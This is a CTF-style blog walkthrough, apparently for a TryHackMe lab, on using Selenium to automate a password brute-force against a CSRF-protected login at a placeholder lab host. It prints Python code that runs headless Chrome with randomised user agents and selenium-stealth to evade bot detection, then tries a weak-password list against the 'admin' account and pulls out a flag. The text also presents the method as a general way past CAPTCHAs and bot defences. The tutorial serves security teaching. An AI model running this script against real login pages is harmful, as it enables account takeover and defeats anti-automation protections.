I’m Chetan Chinchulkar (aka omnipresent), a passionate cybersecurity enthusiast and Software Development Engineer (SDE) by day, CTF addict by night! Currently ranked in the top 1% of TryHackMe (check out my profile here), I spend my free time diving into CTFs, hackthebox, solving cyber mysteries, and obsessively learning new ways to fix (and break) systems.

Why Use Browser Automation?

When you automate the browser, you no longer have to manually break through the layers of encryption. Instead, you let the browser do the heavy lifting, just as it would for a legitimate user. The JavaScript running in the application performs all its logic client-side, including custom encryption and DOM manipulations.

By using browser automation tools, you interact with the application exactly as a real user would. This means that the browser does all the processing for you. Your automation can simply extract the final payloads or responses once they are rendered or transformed.

This makes browser automation tools incredibly useful for:

• Bypassing CAPTCHAs and client-side restrictions — Since you are simulating real interactions, many bot detection mechanisms become less effective. Certain browser automation tools even allow you to inject your browser context, which means the browser used by the automation software will have established trust to bypass bot detection mechanisms.
• Triggering multi-step workflows — Some exploits require interacting with the application across several screens or user actions. Browser automation allows you to chain these steps together fluidly.
• Lifting rendered or dynamically generated values — Often, the data or tokens you want only appear after JavaScript executes. Browser automation gives you direct access to the live DOM and rendered values.

In short, browser automation tools allow you to embrace the application’s logic rather than fight it. By navigating the app as a user would, you can bypass client-side controls, extract dynamic data, and build more resilient and realistic exploits.

we’ll use Selenium due to its ease of use, Python support, and broad browser compatibility. Selenium is a powerful browser automation tool often used for testing, web scraping, or even simulating user behaviour for penetration testing.

Before we analyse the script, let’s understand some essential concepts related to automating web interactions using Selenium:

• WebDriver: Selenium’s WebDriver controls the browser and allows us to navigate to pages, interact with elements, and extract data.
• Element Identification: Selenium provides various methods to locate and interact with elements using attributes like ID, Name, or XPath.
• Headless Mode: A way to run browsers without a graphical interface, making automation faster and more efficient.
• CSRF Protection: Web applications often use Cross-Site Request Forgery (CSRF) tokens to prevent malicious requests. With Selenium, since we are using a browser, the CSRF token is always dynamically generated and submitted with each request.
• Stealth Techniques: Selenium Stealth prevents detection by mimicking human behaviour and masking automated fingerprints.

The web application hosted at http://SECOND_VM_IP/labs/lab1/ validates every login request using a CSRF token. The goal is to perform a brute-force attack using a Selenium-based script to determine the correct password.

Script Overview

The provided Python script in the VNC VM uses Selenium to attempt login attempts using a wordlist of passwords. Below is the breakdown:

from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium_stealth import stealth

import time
import logging
from fake_useragent import UserAgent

• Selenium WebDriver controls the Chrome browser for automation.
• selenium_stealth is used to prevent bot detection.
• fake_useragent generates realistic browser fingerprints to avoid detection.

Step 2 — Configuring the Browser

The browser is configured using various Chrome options for optimal performance and stealth:

options = Options()
ua = UserAgent()
userAgent = ua.random
options.add_argument('--no-sandbox')
options.add_argument('--headless')
options.add_argument("start-maximized")
options.add_argument(f'user-agent={userAgent}')
options.add_argument('--disable-dev-shm-usage')
options.add_argument('--disable-cache')
options.add_argument('--disable-gpu')

• --no-sandbox: Prevents Chrome from using the sandbox mode, which is often necessary when running in Docker or as a root.
• --headless: Runs Chrome without a graphical user interface, making it faster and more efficient.
• start-maximized: Ensures the browser is fully maximised, preventing issues with responsive layouts.
• f'user-agent={userAgent}': Generates a random browser user agent, helping the script evade detection.
• --disable-dev-shm-usage: Prevents memory limitations in Docker containers.
• --disable-cache: Ensures the browser fetches fresh data for each attempt.

Step 3 — Implementing Stealth Techniques

To prevent detection, the script uses selenium-stealth, which modifies browser behaviour to mimic a legitimate user:

stealth(chrome,
    languages=["en-US", "en"],
    vendor="Google Inc.",
    platform="Win32",
    webgl_vendor="Intel Inc.",
    renderer="Intel Iris OpenGL Engine",
    fix_hairline=True,
)

• Languages and Vendor: Mimics a common browser language and vendor configuration.
• WebGL Vendor and Renderer: Masks GPU details to avoid detection through fingerprinting.
• Fix Hairline: Fixes rendering discrepancies that could indicate headless mode.

Performing the Brute-Force Attack

The script uses Selenium to attempt login attempts using a list of passwords. Here’s how it works:

ip = 'http://SECOND_VM_IP/labs/lab1/'
login_url = f'{ip}/index.php'
dashboard_url = f'{ip}/dashboard.php'

username = "admin"
passwords = ["123456", "admin", "letmein", "pass123", "password"]

• Target URL: The application’s login URL and dashboard URL are defined.
• Username: The username admin is used for all attempts.
• Password List: A set of common weak passwords is used for brute-forcing.

Step 1 — Form Submission

Each password is submitted using Selenium’s find_element() method:

chrome.get(login_url)
time.sleep(0.5)

chrome.find_element(By.NAME, "username").send_keys(username)
chrome.find_element(By.NAME, "password").send_keys(password)
chrome.find_element(By.TAG_NAME, "form").submit()

• chrome.get() loads the login page.
• .find_element() locates the username and password input fields using their name attributes.
• .send_keys() simulates typing into the fields.
• .submit() submits the form.

Step 2 — Validating Login Attempts

After submitting the form, the script checks for successful login by verifying whether the browser was redirected to the dashboard:

if dashboard_url in chrome.current_url:
    print(f"[+] Login successful with password: {password}")
    flag_element = chrome.find_element(By.TAG_NAME, "p")
    flag = flag_element.text.strip()
    print(f"[+] {flag}")
    break
else:
    print(f"[-] Failed login with: {password}")

• URL Check: If the current URL matches the dashboard_url, the script assumes the login was successful.
• Extracting Flag: After a successful login, the script extracts and prints the flag using find_element().

Executing the Script

To execute the script, run the following command from the VNC VM terminal:

Terminal

$ cd ~/Desktop/101Selenium
$ source env/bin/activate
$ python3 lab1.py

If a valid password is found, the output will display the successful credentials:

[-] Failed login with: 123456
[--snip--]
[+] Flag: FLAG{***********************}

You can get the Full Code for lab1.py here: